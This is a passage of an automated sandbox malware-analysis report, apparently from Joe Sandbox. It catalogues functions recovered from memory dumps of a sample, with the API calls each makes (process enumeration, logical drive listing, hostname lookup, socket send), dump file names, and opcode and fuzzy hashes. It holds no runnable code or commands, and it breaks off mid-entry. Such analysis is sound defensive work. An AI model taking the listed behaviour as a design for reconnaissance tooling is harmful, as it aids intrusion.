                                                                Function 07000040 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7ed6e9dd33f7624bcaff1ad470901f8d599028b8cf3ec15747b6902df9a0c7a
                                                                • Instruction ID: e51657bf7d1651a7bb10584b95d4931dee369d8e40f58d9574be35b83f20c10d
                                                                • Opcode Fuzzy Hash: e7ed6e9dd33f7624bcaff1ad470901f8d599028b8cf3ec15747b6902df9a0c7a
                                                                • Instruction Fuzzy Hash: E641D2E726D111BDB20281955B54BFE6A2EE7C7370F30823AF417D6682E7E44A0A51F1
                                                                Function 07000075 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01236d8f850d522edeadc9d4696fe6e611dd44624f5edb10a59c598e2eb307c7
                                                                • Instruction ID: 22627d23738ec88753ba54ec225a12d9157d3169deefc1fc9df45624037f77ca
                                                                • Opcode Fuzzy Hash: 01236d8f850d522edeadc9d4696fe6e611dd44624f5edb10a59c598e2eb307c7
                                                                • Instruction Fuzzy Hash: C241B2EB26D211BDB20285559B54BFE6A3DE7C7370F30823AF417D6682E3D44E0A51B1
                                                                Function 06FA03FB Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: cab530ab2c9adf3d437e024f405282d07f9d95fe168a5b12fdf56cb5fe461ee2
                                                                • Instruction ID: 957932e7f3ebd8e9b25555e777797c5cf41531da65b15a64519bdefa2604701c
                                                                • Opcode Fuzzy Hash: cab530ab2c9adf3d437e024f405282d07f9d95fe168a5b12fdf56cb5fe461ee2
                                                                • Instruction Fuzzy Hash: B6A19AFB44C315BEF3818585BB50BFA676EF79A338F308426F407D1642EBA80A4945B5
                                                                Function 0700006C Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: fe422e2a1d65950cfc6179a7f5aad04720eaf077a167d88605230c5ff649335d
                                                                • Instruction ID: 11feb9efb87f18f4cb7caeea169747f06c34db574ca0924ef4cb11435374f7a2
                                                                • Opcode Fuzzy Hash: fe422e2a1d65950cfc6179a7f5aad04720eaf077a167d88605230c5ff649335d
                                                                • Instruction Fuzzy Hash: BC4190EB26D111BDB20281459B54BFE6A2EE7C7370F30823AB427D6682E7E44E4951F1
                                                                Function 06FA0415 Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: b10f80b9fae6fa853ebe5a2a423ff3b006f22bdda4bde6452b3d15e1037b799c
                                                                • Instruction ID: 4d1b1e735816e7ee753212838a12c8f5246f81b8af4b3483fbd7abed08f22817
                                                                • Opcode Fuzzy Hash: b10f80b9fae6fa853ebe5a2a423ff3b006f22bdda4bde6452b3d15e1037b799c
                                                                • Instruction Fuzzy Hash: F6A198FB44C315BEF3818585BB54BFA666EF7DA338F308426F407D1602EBA80A4945B5
                                                                Function 06FA0434 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 912d8da7d51eb68b4afd74b3379fcea83cf9323e0c04235d38297a933812e763
                                                                • Instruction ID: f2bd68f94df02cce715e3d18dcf87077e591dc98d8d6577c85adf63512eef8ac
                                                                • Opcode Fuzzy Hash: 912d8da7d51eb68b4afd74b3379fcea83cf9323e0c04235d38297a933812e763
                                                                • Instruction Fuzzy Hash: 49A178FB44C315BEF3818585BB54BFA676EF79A338F308426F407D1602ABA80A4945B5
                                                                Function 06FA0441 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: c1ba7ba2d44312efae5c4cf16500e6d6802bde15e60c7f0e105b218cfcfbbbaa
                                                                • Instruction ID: 06121ab2c66ad09a31133c8806cc635264997fafe7ac3c75ac543b8a3e24c192
                                                                • Opcode Fuzzy Hash: c1ba7ba2d44312efae5c4cf16500e6d6802bde15e60c7f0e105b218cfcfbbbaa
                                                                • Instruction Fuzzy Hash: 50A187FB44C315AEF3818585BB54BFA676EF7DA338F308426F407D1602EBA80A4945B5
                                                                Function 06FA0486 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: c4b5a73723e8dab51667b0b1bf68292a74a9205192e49b60b5f204628176e39d
                                                                • Instruction ID: bc37b7b846234fb3583af8b19c361a877392250693614a12c7a0d9b5e694b2aa
                                                                • Opcode Fuzzy Hash: c4b5a73723e8dab51667b0b1bf68292a74a9205192e49b60b5f204628176e39d
                                                                • Instruction Fuzzy Hash: 309189FB44C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4945B5
                                                                Function 00934950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • gethostname.WS2_32(00000000,00000040), ref: 00934AA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: gethostname
                                                                • String ID:
                                                                • API String ID: 144339138-0
                                                                • Opcode ID: 8a05a8d4edd1aec4e7407bd67fdac657ff0716203cbb91103cb973b5f4478c01
                                                                • Instruction ID: 9b515b6a3dd30cbe25c5f9d61d2bbefd78b40c41a6f8bc68bf1623c55f1d0770
                                                                • Opcode Fuzzy Hash: 8a05a8d4edd1aec4e7407bd67fdac657ff0716203cbb91103cb973b5f4478c01
                                                                • Instruction Fuzzy Hash: ED51D2706047008BEB309B25DD49727B6E8EF81715F16193DE98A866E1E779FC84CF02
                                                                Function 07000113 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 1701631adabd4b44e1dd8550b5960d60a814f0863db5e79a7654b7f44d3ea205
                                                                • Instruction ID: 505ae6396fe362cb78577b3c5a9b6a39c10efd59dae77b6def7d32048cc7dfe2
                                                                • Opcode Fuzzy Hash: 1701631adabd4b44e1dd8550b5960d60a814f0863db5e79a7654b7f44d3ea205
                                                                • Instruction Fuzzy Hash: 4131B4E626D211BEB20281455B94BFE6A3EE7C7370F30822AB417D56C2E7D44E0A51B1
                                                                Function 07000132 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53c97646666721ea6239c19c80884a491c3f49cee6ab4909aa9b02defe1a9594
                                                                • Instruction ID: 69ffd37de049ecd028c8846cc31f576aec1daa01afc74902b68e7c4b0643f4a7
                                                                • Opcode Fuzzy Hash: 53c97646666721ea6239c19c80884a491c3f49cee6ab4909aa9b02defe1a9594
                                                                • Instruction Fuzzy Hash: 0131C3E62AD211BDB20281419B94BFE963EE7D7330F30863AB427D12C2E7D44A0951F1
                                                                Function 07000167 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 628bb47958c86a6af2f8f493f9c65f510e58177dfd1e5fa0881fe4e0d25e1d3a
                                                                • Instruction ID: 0e5080a792a59f1059aa023890c577fc8920491b39e6e3a2966302edbdadd864
                                                                • Opcode Fuzzy Hash: 628bb47958c86a6af2f8f493f9c65f510e58177dfd1e5fa0881fe4e0d25e1d3a
                                                                • Instruction Fuzzy Hash: 0531A6F765D211BEB20281515B54BFE6B3DEBC7330F30856AB817D6182E7A44E0951B1
                                                                Function 0700015B Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 56aa00761dc5ce65198706ca22c6b59494f33260591f8e61df825f53e7f3ef87
                                                                • Instruction ID: 88b8bcddc9933f5f2631f5728b0c464ed6d5d80a58fb4455656801b7adc73d7b
                                                                • Opcode Fuzzy Hash: 56aa00761dc5ce65198706ca22c6b59494f33260591f8e61df825f53e7f3ef87
                                                                • Instruction Fuzzy Hash: 222193EA26D111BD720281419B94BFE563DE7C7370F30822AB427D26C2E7E44E4951F1
                                                                Function 07000234 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 398a352639f03ad666973572221799f7d034f4fee9f097f7d2f92f7bae6fd819
                                                                • Instruction ID: 53c610d37fc32e2e9c499ac474f45f846f8f28987e1a4b98ee4acbd32ab58ef3
                                                                • Opcode Fuzzy Hash: 398a352639f03ad666973572221799f7d034f4fee9f097f7d2f92f7bae6fd819
                                                                • Instruction Fuzzy Hash: F121D3F625D121BEB202C1515FA8AFE6B6DEBC7370F30857AF806C6082E7D44E4A51B1
                                                                Function 0700027D Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 8bc2e452c2f7dcff97ba4f15cf8f0958d5b9b1a88004873ace77fc9b2cc60bea
                                                                • Instruction ID: 0e028fa694d8eec2724e2958b9d84e731fb20cd41ca94a9b68921c1e786f0987
                                                                • Opcode Fuzzy Hash: 8bc2e452c2f7dcff97ba4f15cf8f0958d5b9b1a88004873ace77fc9b2cc60bea
                                                                • Instruction Fuzzy Hash: E81172FB25D1157EB20686416F94AFFAA6DE6C7370F30857EF406D2182E6D40E0951B1
                                                                Function 07000263 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 62c3885f88b763faea934f5a4111ba07dfd9b138f206306f7a14c9f9bc162443
                                                                • Instruction ID: 8c20ce4f851e3e7efdad1f69a4f74735e7762d3fff6d0f69eb1a9e84c5e6d0c4
                                                                • Opcode Fuzzy Hash: 62c3885f88b763faea934f5a4111ba07dfd9b138f206306f7a14c9f9bc162443
                                                                • Instruction Fuzzy Hash: 1311D0FB29D1217E7206C1816BA8AFF6A2CE7C7370F30853AB816D2482E7D04E4D51B1
                                                                Function 0700026F Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 8ad37de52552d3f7d988a837bbfb79edce3144a910d799afb3d9443bab0365e3
                                                                • Instruction ID: f2f55c7dc7d9a75b790d0eaf9e65be387ee56d8ac7f5338ab5f4ce42e124f5e4
                                                                • Opcode Fuzzy Hash: 8ad37de52552d3f7d988a837bbfb79edce3144a910d799afb3d9443bab0365e3
                                                                • Instruction Fuzzy Hash: 101191FB25D1217E7206C5416F98AFEA62DE6C7370F30857AB816D2182E7D00E4D51B1
                                                                Function 06FB0C61 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: 92935da883f60d4d42c2958aaf742df708a9f0bcf5e222e4212cf3d87f4a5127
                                                                • Instruction ID: d59a7fd2c59a42f3f29e6557bbdb014b757f61ae0ff2b3b2fd103b2a262e2f83
                                                                • Opcode Fuzzy Hash: 92935da883f60d4d42c2958aaf742df708a9f0bcf5e222e4212cf3d87f4a5127
                                                                • Instruction Fuzzy Hash: D60149D3108101BDF3D2A6576B507F77B9EEBCA3307309866F047C6642DF491A4652B2
                                                                Function 06FB0C7E Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: fc367792e0f81908fdcbbab916e9c801a8cd87e2a19189f925e36eb69e01a569
                                                                • Instruction ID: 5d815b520ed6121d1c0f1cdbd749301ec1c6604192e4f264f2e364ae73acb812
                                                                • Opcode Fuzzy Hash: fc367792e0f81908fdcbbab916e9c801a8cd87e2a19189f925e36eb69e01a569
                                                                • Instruction Fuzzy Hash: 29017BE310C1417DF382A2B66A513F77FADDA8B3307315866E442CA283DE490A464172
                                                                Function 06FB0CF0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: ef778b6e09abdd98d7c3f10afc916a84825ffe94f7b7dcf30fcf6c788e7a0362
                                                                • Instruction ID: 1c73a7b70be4840dfd2fc1be6db9b0a4622efbf48fd90143119945ec4ad1e19d
                                                                • Opcode Fuzzy Hash: ef778b6e09abdd98d7c3f10afc916a84825ffe94f7b7dcf30fcf6c788e7a0362
                                                                • Instruction Fuzzy Hash: EBF0F9E710C1417DB781A2A727517F7BBAAD9CB3303306866F453C9542DF49064A4572
                                                                Function 07000312 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 96abc433b166547b68d3e40780acc813ca4e0f7039edc74ec249db84facfb016
                                                                • Instruction ID: e24cda7aa77cde2be9a4d4cc2b59e87cc07b420b8526006dec986b86ae3a18bf
                                                                • Opcode Fuzzy Hash: 96abc433b166547b68d3e40780acc813ca4e0f7039edc74ec249db84facfb016
                                                                • Instruction Fuzzy Hash: 42F0E2FA30D2187FB212A9415FC4ABF667CDAD73B0B31853AF815D6142E6E00C4E92B0
                                                                Function 0094AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 0094AFD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID:
                                                                • API String ID: 3358416759-0
                                                                • Opcode ID: 6e839ce3109f8f125d22f9d3b7acc392664cb6410cd6a47ff7bf5e62a9a470b0
                                                                • Instruction ID: dd1a116f933e663e61f5c8aaa4bbf5cbbfda3af955140f696538fa0956f76678
                                                                • Opcode Fuzzy Hash: 6e839ce3109f8f125d22f9d3b7acc392664cb6410cd6a47ff7bf5e62a9a470b0
                                                                • Instruction Fuzzy Hash: D611B97084878495EB268F1CD802BF6F3F8EFD0329F109618E5D942150F7329AC98BC2
                                                                Function 06FB0CA5 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: 44bb1c2adc51ee0b22e03582893974e1ece9b06ef540a105147933f05e692bed
                                                                • Instruction ID: f493e5a6a7ac9e6fc187b0ea95c9c7e9dfb377bc3f5c2e1fa1d5550874fec431
                                                                • Opcode Fuzzy Hash: 44bb1c2adc51ee0b22e03582893974e1ece9b06ef540a105147933f05e692bed
                                                                • Instruction Fuzzy Hash: 1AF024E71080017DF7C1A1572E506F77BAADACA330320985AF411CA583DF581A564573
                                                                Function 0094A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0094A97F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: 260745ed54d2ddc828b066881aa2ff39f961867f94ae1d1b8db9b86baad3a00f
                                                                • Instruction ID: 027414d7aa17cb61c801880072ebb54ba47c7c39a3b120f8f33c4b55889adcc7
                                                                • Opcode Fuzzy Hash: 260745ed54d2ddc828b066881aa2ff39f961867f94ae1d1b8db9b86baad3a00f
                                                                • Instruction Fuzzy Hash: 5901A2B6B10710AFC6148F14DC85F56B7A5EF84720F06865DEA982B361C331AC108BE1
                                                                Function 07000333 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
